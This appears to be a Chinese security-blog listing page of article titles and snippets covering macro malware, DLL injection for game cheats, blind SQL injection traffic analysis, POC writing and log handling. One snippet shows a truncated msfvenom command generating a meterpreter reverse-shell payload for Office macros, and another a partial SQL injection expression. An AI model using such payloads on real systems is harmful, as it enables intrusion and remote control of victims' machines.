作者:NS Demon团队,投稿。起因:夜黑风高的晚上内卷中,某大佬发了一张图过来。 1. 大佬来吊我:2. 通过一番交流,他将phpinfo给了我:接着看了一下问题:&...
Office宏病毒几种简单生成方式
一、前言文章有点水大佬们别喷二、msfVENOM生成宏在linux中msfvenom生成vba文件msfvenom -p windows/meterpreter/reverse_tcp -e x86/...
DNS漏洞使国家级间谍活动像注册域一样简单
一种涉及使用特定名称注册域的新域名系统 (DNS) 攻击方法可用于研究人员所描述的“国家级间谍活动”。Wiz首席技术官Ami Luttwak和Shir Tamari于上周在拉斯维加斯举行的Black ...
如何用goby自定义POC(简单易懂)
这里以Jellyfin 任意文件读取漏洞为例子一、如何用goby自定义poc启动goby,填写漏洞名称,fofa查询语句点一下提交,然后点测试,到这里开始编写poc,测试URL那里填写URI,可以是G...
使用的四种简单的情报分析技术
在我的情报培训期间,我们学到了一大堆不同的分析技术。以下是我的四种 "常用 "技巧,我每天都在使用并应用于解决问题。我希望你能学会如何使用和应用这些简单(但有效)的技巧来提高你自己的分析能力,并最终成...
C语言游戏外挂(四):简单 DLL 注入游戏
声明:本系列文章由网络转载, 转载来源未知, 版权属于原作者,特...
一个简单的流量分析问题
0x1-导出http对象0x2-发现是盲注当为真时,返回长度为21的 Hello admin!否则返回 no data举个例子当id=1'and (select ascii(substr(databa...
C语言游戏外挂(五):简单 DLL 劫持
声明:本系列文章由网络转载, 转载来源未知, 版权属于原作者,特...
简单方便的 JavaScript 逆向辅助模拟方法
这是「进击的Coder」的第 419 篇技术分享作者:崔庆才来源:崔庆才丨静觅“ 阅读本文大概需要 3 分钟。 ”在 JavaScript 逆向过程中,我们可能找到了一些入口,但是深入追踪下...
补天付费厂商逻辑漏洞简单挖掘
闲来无事 给大家讲一下简单的逻辑漏洞挖掘额 某天下午 准备刷刷补天排名 奈何大牛们基本把肉都吃光了 &...
针对 win 的入侵日志简单处理
详情请 '阅读原文',或直接移步至个人博客https://klionsec.github.io/2017/05/19/wevtutil/ 本文始发于微信公众号(红队防线):针对 win 的入侵日志简单...
一次简单的代码审计
最近某漏洞平台出了一个活动……挖来挖去都没有办法搞到啥代码执行都漏洞,不服~(每天烦躁的很)然后想了下emlog这个博客系统,以前也挖过什么漏洞,再去把源码下载下来试一试吧!结果发现这套系统的开发好像...